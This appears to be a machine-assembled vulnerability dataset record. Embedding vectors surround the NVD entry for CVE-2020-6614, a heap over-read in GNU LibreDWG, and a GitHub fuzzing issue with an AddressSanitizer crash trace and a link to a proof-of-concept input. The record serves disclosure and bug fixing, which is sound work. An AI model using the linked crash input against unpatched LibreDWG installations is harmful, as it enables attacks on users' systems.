-0.0011320296907797456, 0.005201112478971481, 0.01249511819332838, 0.011102449148893356, -0.0056757088750600815, 0.0013284815941005945, 0.009896507486701012, -0.01573171280324459, 0.0090017756447196, 0.002666688524186611, 0.020539920777082443, -0.010013211518526077, -0.02441449649631977, 0.019715212285518646, -0.012028302066028118, 0.016260771080851555, -0.0035361340269446373, -0.006504307966679335, 0.010775677859783173, 0.00412743492051959, -0.0179413091391325, -0.003571145236492157, 0.004142995458096266, -0.01969965174794197, -0.0036470028571784496, -0.019108349457383156, -0.02323189564049244, -0.013086418621242046, 0.012074983678758144, -0.0169921163469553, 0.015568326227366924, -0.01725664548575878, 0.028086785227060318, 0.0012915253173559904, 0.010845700278878212, -0.005465641617774963, -0.007900867611169815, -0.007838624529540539, -0.017303327098488808, -0.001353767467662692, 0.0008412420284003019, 0.018361443653702736, 0.0020423217210918665, 0.005453971214592457, 0.0011913542402908206, -0.02116234228014946, -0.0010872931452468038, -0.017272206023335457, -0.009266304783523083, -0.0032618793193250895, -0.008776147849857807, -0.017661219462752342, -0.0012837450485676527, -0.014136755838990211, 0.017054358497262, -0.0035147382877767086, 0.004765416961163282, -0.010129915550351143, 0.002118179341778159, 0.0005465641734190285, -0.015062608756124973, 0.016089605167508125, 0.013273146003484726, 0.004617591854184866, -0.01627633161842823, -0.016338573768734932, -0.002643347717821598, -0.009709781035780907, -0.007266774773597717, -0.015443841926753521, -0.008892851881682873, -0.006169756408780813, -0.02916046231985092, -0.012129445560276508, -0.010371103882789612, 0.01817471720278263, 0.013825545087456703, -0.004279150161892176, 0.009453031234443188, 0.004489217419177294, -0.015996241942048073, 0.0018915788969025016, -0.001531741232611239, 0.016198528930544853, 0.005146650597453117, -0.001956738531589508, -0.004002950619906187, 0.0051972223445773125, 0.006776617839932442, 0.015085949562489986, -0.004567020107060671, -0.0031490654218941927, 0.0029292728286236525, 0.00604527210816741, 0.008169286884367466, -0.00671437568962574, -0.004613701719790697, 0.005080518312752247, 0.028615843504667282, -0.004213017877191305, 0.031727954745292664, -0.004936583340167999, -0.0006593781290575862, 0.0042052376084029675, 0.0019236725056543946, -0.0004964786930941045, 0.05368388444185257, -0.0094141298905015, -0.005753512028604746, -0.01650973968207836, -0.007488512899726629, -0.014759177342057228, 0.00028957202448509634, -0.004613701719790697, 0.007317346520721912, 0.02312297187745571, 0.008931753225624561, 0.02055548131465912, -0.009888727217912674, 0.005877996329218149, -0.005625137127935886, -0.0011806563707068563, 0.033112842589616776, -0.005072738043963909, -0.005893556866794825, -0.012821889482438564, -0.0038745759520679712, -0.014953684993088245, 0.00832489226013422, -0.009943189099431038, 0.02024427056312561, 0.004403634462505579, -0.007157851010560989, 0.010861260816454887, -0.0014626913471147418, -0.0024488409981131554, 0.013716621324419975, -0.011608167551457882, -0.011872696690261364, 0.009336327202618122, 0.005831314716488123, 0.0010046277893707156, 0.0014879772206768394, -0.002639457583427429, 0.04120432585477829, 0.0033649681136012077, 0.013522114604711533, -0.025379249826073647, 0.011709311045706272, 0.012557360343635082, -0.00924296397715807, -0.011693750508129597, -0.02380763553082943, 0.003012910718098283, 0.0141756571829319, 0.013685500249266624, 0.004687614273279905, 0.029549475759267807, -0.007344577461481094, -0.013444311916828156, 0.010184377431869507, 0.011234713718295097, -0.009406349621713161, 0.007819173857569695, -0.02113122120499611, -0.0072862254455685616, -0.0071267299354076385, -0.021411310881376266, 0.007399039342999458 ]
2,088
CVE-2020-6614
2020-01-08T21:15:11.630000
GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in bfr_read in decode.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00046.html" }, { "source": "[email protected]", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00052.html" }, { "source": "[email protected]", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447068" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.9.3.2564:*:*:*:*:*:*:*", "matchCriteriaId": "6292F71C-4D80-4570-A07D-C790FEEE9B2B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "matchCriteriaId": "40513095-7E6E-46B3-B604-C926F1BA3568", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/179#issuecomment-570447068
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/179/comments
7
2020-01-03T03:19:25
2020-01-16T12:12:04Z
https://github.com/LibreDWG/libredwg/issues/179
544,834,443
179
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwg2svg2 $PoC **1.heap-buffer-overflow in read_pages_map ../../src/decode_r2007.c:1007** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_0.9.3.2564/id:000239%2Csig:06%2Csrc:007083%2Cop:havoc%2Crep:4 ASAN says: ``` ==4335==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000000258 at pc 0x55f9e1e04e05 bp 0x7ffc92f94a40 sp 0x7ffc92f94a30 READ of size 8 at 0x611000000258 thread T0 #0 0x55f9e1e04e04 in read_pages_map ../../src/decode_r2007.c:1007 #1 0x55f9e1e04e04 in read_r2007_meta_data ../../src/decode_r2007.c:1774 #2 0x55f9e1dd66d7 in decode_R2007 ../../src/decode.c:2973 #3 0x55f9e1dd66d7 in dwg_decode ../../src/decode.c:241 #4 0x55f9e177b466 in dwg_read_file ../../src/dwg.c:210 #5 0x55f9e1776d4b in test_SVG ../../examples/dwg2svg2.c:116 #6 0x55f9e1776d4b in main ../../examples/dwg2svg2.c:501 #7 0x7f595f806b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x55f9e17779a9 in _start (/home/user/linhlhq/libredwg/asan_build/examples/dwg2svg2+0x2d59a9) 0x61100000025c is located 0 bytes to the right of 220-byte region [0x611000000180,0x61100000025c) allocated by thread T0 here: #0 0x7f5960052d38 in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xded38) #1 0x55f9e1de73be in read_system_page ../../src/decode_r2007.c:635 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../src/decode_r2007.c:1007 in read_pages_map Shadow bytes around the buggy address: 0x0c227fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c227fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c227fff8020: 00 00 00 00 00 00 fa fa fa fa fa fa fa fa fa fa 0x0c227fff8030: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c227fff8040: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c227fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==4335==ABORTING ``` --- end body ---
3,142
[ -0.03797630965709686, 0.023580849170684814, -0.009923230856657028, 0.0025993897579610348, 0.05773242563009262, 0.03369983658194542, 0.0023979886900633574, 0.04752309247851372, -0.02100592851638794, 0.03806665912270546, -0.0077699352987110615, 0.010698718950152397, 0.004457172006368637, 0.013010123744606972, -0.0034765189047902822, 0.019470011815428734, -0.014026540331542492, 0.008560480549931526, -0.01835571974515915, -0.026607509702444077, 0.013717850670218468, -0.004743274301290512, -0.025628739967942238, 0.023159224539995193, -0.029257720336318016, 0.007837696000933647, 0.0056580486707389355, -0.003213003743439913, -0.021337205544114113, 0.01784374564886093, -0.0012874602107331157, 0.02954382263123989, 0.011760309338569641, 0.0071977307088673115, 0.0234603863209486, 0.0007792522083036602, 0.04255394637584686, 0.07035104185342789, 0.016292771324515343, 0.0344226211309433, 0.014086771756410599, -0.06252087652683258, -0.011948534287512302, 0.019470011815428734, -0.001461568521335721, 0.003361701499670744, 0.029092082753777504, 0.0066669355146586895, -0.032013338059186935, 0.015103188343346119, -0.015554928220808506, -0.00863577052950859, -0.04378870502114296, -0.06679735332727432, 0.018867691978812218, -0.026547279208898544, 0.01913873478770256, 0.01913873478770256, 0.0027104425244033337, -0.00980276707559824, -0.009381142444908619, -0.004016725346446037, -0.013092943467199802, 0.02413799613714218, 0.0008159561548382044, 0.012942362576723099, -0.03234461322426796, 0.01282189879566431, -0.026803264394402504, -0.0019518950721248984, 0.00764570664614439, -0.04198174178600311, 0.0007274902891367674, 0.021924467757344246, 0.027797093614935875, -0.0154946967959404, 0.0056844004429876804, -0.004547520074993372, -0.014839672483503819, 0.020147623494267464, -0.02246655710041523, 0.0379461944103241, -0.033729951828718185, 0.02329474687576294, 0.01669933833181858, -0.003948964178562164, -0.021246857941150665, -0.08384302258491516, -0.004336708225309849, -0.0493902862071991, -0.007800051011145115, 0.0264117568731308, 0.012099114246666431, -0.011737721972167492, 0.0066029392182827, 0.005631697364151478, -0.034723781049251556, -0.016624046489596367, -0.05399803817272186, 0.0037400342989712954, -0.04601728916168213, -0.009704889729619026, -0.0015048602363094687, 0.02074994333088398, 0.022391267120838165, 0.022933354601264, -0.0019820111338049173, 0.002452573971822858, 0.0038172064814716578, 0.10926094651222229, 0.031230321153998375, -0.012347571551799774, -0.02630634978413582, 0.00998346321284771, -0.004747038707137108, 0.008372255600988865, 0.029558882117271423, -0.0025429220404475927, -0.06589386612176895, -0.021713655441999435, -0.002973957685753703, -0.024634910747408867, -0.027315236628055573, 0.007638177368789911, -0.0390002578496933, 0.016880033537745476, 0.011579612269997597, -0.015027898363769054, -0.010103926993906498, -0.014771911315619946, -0.03448285162448883, -0.03821723908185959, 0.013220936059951782, -0.02464996837079525, 0.007032092660665512, -0.00938867125660181, -0.021924467757344246, 0.031953103840351105, 0.004336708225309849, 0.001963188638910651, -0.056979525834321976, -0.03999408334493637, 0.023385096341371536, -0.007920515723526478, -0.034874361008405685, 0.0035743960179388523, -0.03854851424694061, 0.018431009724736214, 0.001848371233791113, -0.006700816098600626, -0.0017730811377987266, -0.026848439127206802, 0.0007590180030092597, 0.028625285252928734, 0.03677166998386383, -0.02538781240582466, 0.027857325971126556, 0.049480631947517395, 0.012746608816087246, -0.02480054832994938, 0.009682303294539452, -0.03770526871085167, 0.022165397182106972, -0.03806665912270546, -0.026502104476094246, -0.019168851897120476, 0.03514540567994118, 0.0234603863209486, -0.011376329697668552, 0.023159224539995193, -0.009614542126655579, -0.012242165394127369, 0.030146144330501556, 0.019078504294157028, -0.054118502885103226, -0.002360343700274825, 0.0071299695409834385, 0.024318693205714226, -0.011022466234862804, -0.014704150147736073, 0.00865835789591074, -0.00808615330606699, 0.019981984049081802, 0.012001236900687218, 0.009185388684272766, 0.0003493929689284414, 0.03719329461455345, -0.018009385094046593, -0.002142002573236823, -0.017934095114469528, -0.017226368188858032, -0.00027433817740529776, 0.010841770097613335, -0.016774628311395645, 0.027526048943400383, -0.030959276482462883, -0.03303728252649307, -0.01398889534175396, 0.032946933060884476, -0.012407803907990456, -0.006282956339418888, 0.017482353374361992, -0.02251172997057438, 0.020644536241889, -0.016292771324515343, 0.019485069438815117, 0.004001667257398367, 0.05451001226902008, 0.012889659963548183, -0.012227107770740986, -0.016202423721551895, -0.030236491933465004, 0.02053913101553917, 0.0065841167233884335, -0.02199975773692131, 0.01596149429678917, -0.011097756214439869, 0.030236491933465004, -0.02808319590985775, -0.0004945616237819195, 0.021246857941150665, -0.020780058577656746, 0.005447236355394125, -0.009313381277024746, -0.08173490315675735, -0.014553570188581944, 0.006629290524870157, 0.02401753142476082, -0.044902998954057693, 0.003627099096775055, 0.0333685576915741, -0.04674007371068001, -0.000052673640311695635, 0.025056535378098488, -0.025869667530059814, 0.0009058336727321148, -0.004050605930387974, 0.013883489184081554, -0.019620591774582863, 0.00813885685056448, 0.026818322017788887, 0.02511676773428917, -0.014049126766622066, -0.012264752760529518, 0.022195512428879738, 0.04171069711446762, -0.021698597818613052, -0.008771292865276337, -0.033007167279720306, 0.025658855214715004, -0.0025052770506590605, -0.028324123471975327, 0.016548756510019302, 0.03135078400373459, 0.01752752810716629, 0.005210072733461857, 0.030507536605000496, 0.024454215541481972, -0.023430269211530685, -0.03279635310173035, 0.03797630965709686, 0.012882131151854992, -0.013288697227835655, 0.0040091960690915585, 0.005040670279413462, -0.0013571034651249647, -0.013891017995774746, 0.009373613633215427, -0.01154949702322483, -0.037675149738788605, 0.05402815341949463, -0.023475443944334984, -0.01128598116338253, -0.024845723062753677, -0.017497412860393524, 0.0069116284139454365, 0.03348902240395546, -0.0010804125340655446, -0.0003976256703026593, -0.016714395955204964, -0.008417429402470589, 0.01909356191754341, -0.027691688388586044, 0.03728364408016205, -0.001037120702676475, -0.018175022676587105, -0.007001976482570171, -0.019364606589078903, -0.02059936337172985, -0.019485069438815117, 0.0007961925002746284, -0.014470751397311687, -0.03797630965709686, -0.007099853362888098, -0.012949892319738865, 0.03650062531232834, 0.00509713776409626, -0.013537154532968998, -0.043547775596380234, -0.013702793046832085, -0.025463102385401726, -0.006410949397832155, -0.019725998863577843, -0.009155272506177425, -0.03625969588756561, 0.002957017393782735, -0.016624046489596367, 0.024484330788254738, -0.03153148293495178, -0.01971093937754631, 0.031230321153998375, -0.04779413715004921, -0.003420051420107484, -0.027134541422128677, -0.03376006707549095, -0.023174284026026726, 0.0008145444444380701, -0.02350555919110775, 0.014884847216308117, 0.004095779731869698, -0.04881808161735535, -0.025101710110902786, -0.04378870502114296, 0.012377687729895115, 0.03448285162448883, -0.020524073392152786, 0.004178598988801241, 0.04207209125161171, -0.061647508293390274, 0.019439896568655968, 0.015841031447052956, -0.022225627675652504, 0.0002613977121654898, -0.022541847079992294, -0.00811626948416233, -0.04056628793478012, -0.03915083780884743, 0.022120222449302673, 0.028565052896738052, -0.020780058577656746, -0.018491240218281746, 0.04415009543299675, 0.002973957685753703, 0.010864357464015484, 0.01341669075191021, -0.02585460990667343, 0.013123058713972569, -0.015976551920175552, 0.029031850397586823, -0.014109359122812748, 0.0010135925840586424, 0.05661813169717789, -0.005093373358249664, 0.04207209125161171, 0.0008088976610451937, -0.020569246262311935, -0.004547520074993372, -0.03583807498216629, 0.016910148784518242, -0.02725500613451004, 0.001630029990337789, -0.006316836923360825, 0.0035141638945788145, 0.016036784276366234, 0.011587142013013363, 0.014019010588526726, 0.0047357454895973206, 0.0011829952709376812, -0.005759690422564745, 0.004031783435493708, -0.04041570797562599, 0.06745990365743637, -0.027330296114087105, -0.018446067348122597, -0.008568010292947292, -0.026291292160749435, 0.0446319542825222, 0.013747966848313808, -0.038668978959321976, -0.0012375805526971817, -0.03508517146110535, 0.00203471421264112, 0.011029995046555996, -0.034151576459407806, 0.03165194392204285, 0.04134930670261383, -0.006106024608016014, 0.023053819313645363, -0.009938289411365986, -0.024303633719682693, -0.011218219995498657, 0.06721897423267365, -0.009855469688773155, -0.048757847398519516, 0.0030812460463494062, 0.02471020072698593, -0.02252678945660591, -0.017979267984628677, 0.017331773415207863, -0.054419662803411484, -0.01373290829360485, 0.027691688388586044, -0.022767717018723488, 0.003617687849327922, 0.0074574812315404415, 0.041469771414995193, 0.007032092660665512, -0.02481560781598091, 0.010412616655230522, 0.00586509658023715, 0.006700816098600626, -0.015539870597422123, -0.016247596591711044, 0.004284005146473646, 0.04963121563196182, 0.028685515746474266, -0.008643300272524357, 0.010939647443592548, -0.020012101158499718, -0.003587571904063225, -0.023836836218833923, -0.005522526800632477, 0.024363866075873375, 0.02023797109723091, -0.0074574812315404415, 0.006113553885370493, -0.016473466530442238, 0.014606273733079433, 0.020042216405272484, -0.021728714928030968, -0.0025128060951828957, 0.010615900158882141, 0.008048508316278458, 0.02854999527335167, -0.02854999527335167, -0.041590236127376556, -0.018702052533626556, -0.03379018232226372, -0.004332943353801966, 0.014832143671810627, 0.015163419768214226, 0.03505505621433258, -0.033669717609882355, -0.018596647307276726, -0.009637128561735153, -0.04026512801647186, -0.04008443281054497, 0.000011440561138442717, 0.018476182594895363, -0.03833770379424095, 0.0013523978414013982, 0.013589857146143913, -0.026607509702444077, 0.008696002885699272, 0.013371516019105911, -0.0038812030106782913, -0.04080721735954285, 0.0032261793967336416, 0.018235255032777786, 0.012565912678837776, 0.005774748511612415, 0.029604054987430573, -0.015027898363769054, -0.010578255169093609, 0.026547279208898544, 0.04737251251935959, 0.04306592047214508, -0.0320434533059597, 0.004946557804942131, -0.010156630538403988, 0.004498581867665052, 0.033880531787872314, 0.01928931660950184, -0.011993708088994026, -0.004028018563985825, 0.0217889454215765, -0.00296454643830657, -0.00983288325369358, -0.004359295126050711, -0.024469273164868355, -0.00014163943706080317, -0.020524073392152786, 0.008387314155697823, -0.027209831401705742, 0.013537154532968998, -0.018897807225584984, 0.036319930106401443, 0.007167614530771971, 0.006983153987675905, 0.03704271465539932, 0.004871267359703779, 0.008771292865276337, -0.021186625584959984, -0.05002272129058838, 0.005609109997749329, 0.01809973269701004, -0.006154963281005621, -0.029197489842772484, 0.04077710211277008, 0.015374232083559036, 0.027239946648478508, 0.003911319188773632, 0.038819558918476105, 0.013439277186989784, 0.008191559463739395, -0.00032115919748321176, -0.02897161804139614, 0.0211715679615736, -0.012686376459896564, -0.04165046662092209, 0.006497533060610294, -0.023430269211530685, 0.004073192831128836, -0.04713158309459686, 0.0007632530760020018, -0.023580849170684814, -0.005360653158277273, 0.004438349511474371, 0.009381142444908619, -0.0007717232219874859, -0.006015676539391279, -0.042041976004838943, -0.01035238429903984, 0.026818322017788887, 0.018190080299973488, 0.0013034592848271132, 0.0027894971426576376, -0.016051843762397766, 0.03719329461455345, -0.02808319590985775, 0.0011387623380869627, 0.000943478662520647, -0.029528765007853508, 0.041319191455841064, -0.008861641399562359, 0.009908173233270645, -0.008244263008236885, 0.021713655441999435, 0.007385955657809973, -0.015306470915675163, -0.02730017900466919, 0.026231059804558754, -0.05207061395049095, 0.0010804125340655446, -0.0027198537718504667, 0.017557643353939056, -0.0000985241131274961, 0.022059990093111992, 0.0043404726311564445, -0.015690449625253677, -0.007672057952731848, -0.016910148784518242, 0.014824614860117435, 0.00853036530315876, -0.00018728405120782554, 0.011007408611476421, -0.011195633560419083, -0.004615281242877245, 0.027706746011972427, -0.01258097030222416, 0.003446402959525585, -0.001581091433763504, 0.02918243035674095, -0.003064305754378438, -0.004573871847242117, 0.0008677180740050972, -0.013906075619161129, 0.027751918882131577, -0.03806665912270546, -0.02324957400560379, 0.028053080663084984, 0.019741056486964226, 0.014184649102389812, -0.024619853124022484, -0.031139973551034927, -0.0024977480061352253, -0.0274658165872097, -0.0018831929191946983, -0.009351026266813278, -0.029724519699811935, -0.0008484249701723456, -0.0377654992043972, -0.006821280345320702, 0.020298203453421593, 0.020358433946967125, -0.01716613583266735, -0.001818255172111094, 0.004046841058880091, 0.03484424576163292, -0.00844754558056593, -0.0016817919677123427, -0.0007660764385946095, -0.00813885685056448, -0.011248336173593998, 0.02583955228328705, 0.00705844396725297, -0.015946436673402786, 0.01053308043628931, -0.01689509116113186, 0.002926901448518038, -0.013130588456988335, 0.023053819313645363, 0.03005579672753811, -0.040325362235307693, -0.030462361872196198, 0.010269565507769585, 0.014079242944717407, -0.012415332719683647, -0.010427674278616905, 0.020840290933847427, 0.03761491924524307, 0.0040543703362345695, 0.05074550583958626, -0.019951868802309036, 0.016187364235520363, -0.00013634561037179083, -0.00920044630765915, 0.014598744921386242, -0.0401446633040905, 0.017331773415207863, 0.01505801361054182, -0.03984350338578224, 0.010442732833325863, 0.019078504294157028, 0.013175762258470058, 0.03192298859357834, 0.009147743694484234, -0.0070471507497131824, -0.012558383867144585, -0.009177859872579575, -0.02184917777776718, 0.01846112497150898, 0.007167614530771971, -0.032675888389348984, -0.014997782185673714, 0.033248092979192734, 0.0425238311290741, 0.019485069438815117, -0.0188827496021986, 0.008643300272524357, -0.0017749633407220244, -0.002431869274005294, -0.01170007698237896, 0.016081959009170532, -0.01794915273785591, -0.014282526448369026, -0.0005736162420362234, 0.017301658168435097, 0.016624046489596367, 0.042674411088228226, -0.02043372578918934, -0.010902002453804016, 0.01037497166544199, 0.01757270283997059, 0.025598622858524323, -0.006456123664975166, 0.016970381140708923, 0.03505505621433258, -0.009456432424485683, 0.008455074392259121, -0.01429758407175541, -0.015359174460172653, -0.036018770188093185, 0.009878057055175304, -0.0016083840746432543, 0.005966737866401672, -0.03297705203294754, -0.007246669381856918, 0.017753398045897484, 0.032434962689876556, -0.0002769262937363237, -0.0109170600771904, -0.0038172064814716578, 0.0012695788173004985, -0.011933475732803345, -0.022647252306342125, 0.014967666007578373, 0.020509015768766403, -0.026532219722867012, 0.012490622699260712, 0.0015867382753640413, 0.009787709452211857, 0.00001644029180170037, -0.014192177914083004, -0.036380160599946976, 0.005673106759786606, -0.001720378058962524, -0.011526909656822681, -0.012724021449685097, -0.02424340322613716, 0.027842268347740173, -0.014862259849905968, 0.007024563383311033, 0.016548756510019302, 0.0188827496021986, -0.016337944194674492, 0.02844458818435669, -0.011722663417458534, -0.018385834991931915, -0.003832264570519328, -0.019650708884000778, -0.005906505975872278, 0.008560480549931526, -0.004923970438539982, 0.0189279243350029, 0.01814490742981434, -0.007363368757069111, 0.00036703908699564636, 0.027646513655781746, 0.0030680703930556774, -0.010721306316554546, 0.006264133844524622, -0.042102206498384476, 0.0054171206429600716, 0.0011877008946612477, -0.027992848306894302, 0.012535796500742435, 0.012784253805875778, -0.01035238429903984, 0.005808629095554352, -0.010427674278616905, -0.026923729106783867, -0.006689522881060839, -0.04565589874982834, 0.0013109883293509483, -0.016819801181554794, 0.000859247928019613, -0.008613184094429016, -0.008967047557234764, 0.012912247329950333, 0.013258581049740314, -0.02704419381916523, 0.0010615900391712785, 0.011963591910898685, -0.02507159300148487, 0.01763293519616127, 0.016925208270549774, -0.016985440626740456, 0.013891017995774746, 0.01737694814801216, 0.009027278982102871, 0.0005552642396651208, 0.015186007134616375, -0.030658116564154625, -0.01429758407175541, -0.0003178652550559491, 0.0166391059756279, 0.010277094319462776, -0.031380899250507355, 0.030146144330501556, 0.008515306748449802, 0.007626884151250124, 0.010487906634807587, -0.03207356855273247, -0.0022154103498905897, -0.01814490742981434, 0.017934095114469528, -0.02876080572605133, 0.001978246495127678, -0.009471490979194641, -0.02428857609629631, 0.022029874846339226, -0.012144288048148155, 0.015946436673402786, 0.0367114394903183, -0.012724021449685097, 0.013687734492123127, -0.0309893935918808, 0.019997041672468185, 0.0024186933878809214, 0.026637626811861992, -0.000998534495010972, -0.011971120722591877, -0.0005872625624760985, 0.012596028856933117, -0.026908671483397484, 0.0039000255055725574, 0.016081959009170532, 0.0263665821403265, 0.016624046489596367, -0.014455693773925304, -0.014568628743290901, -0.03707282990217209, 0.020253028720617294, 0.012995066121220589, -0.002876080572605133, 0.043397195637226105, -0.013168233446776867, 0.0061210826970636845, 0.016217481344938278, 0.00020410667639225721, -0.011398916132748127, 0.029001735150814056, -0.021337205544114113, -0.008372255600988865, -0.03490447625517845, 0.031380899250507355, 0.01950012892484665, -0.005420885048806667, -0.020719828084111214, 0.026712916791439056, -0.016503583639860153, -0.040536172688007355, -0.019003214314579964, -0.007943102158606052, -0.033880531787872314, -0.018446067348122597, 0.03806665912270546, -0.021879294887185097, 0.02543298527598381, -0.006998212076723576, 0.004713158588856459, 0.006591645535081625, 0.02927277982234955, -0.007980747148394585, -0.004268947057425976, 0.006508826743811369, -0.012987537309527397, 0.001985775539651513, 0.010683661326766014, -0.028384355828166008, 0.0045136394910514355, -0.004811035469174385, -0.059780314564704895, -0.0000168520346051082, -0.030778581276535988, -0.007291843183338642, 0.00831955298781395, 0.02153296023607254, 0.008982105180621147, -0.00901975017040968, -0.004110837820917368, -0.0120614692568779, 0.010630957782268524, 0.013958779163658619, 0.02081017568707466, 0.016458408907055855, -0.0001661087153479457, -0.008575539104640484, 0.05077562481164932, -0.021879294887185097, 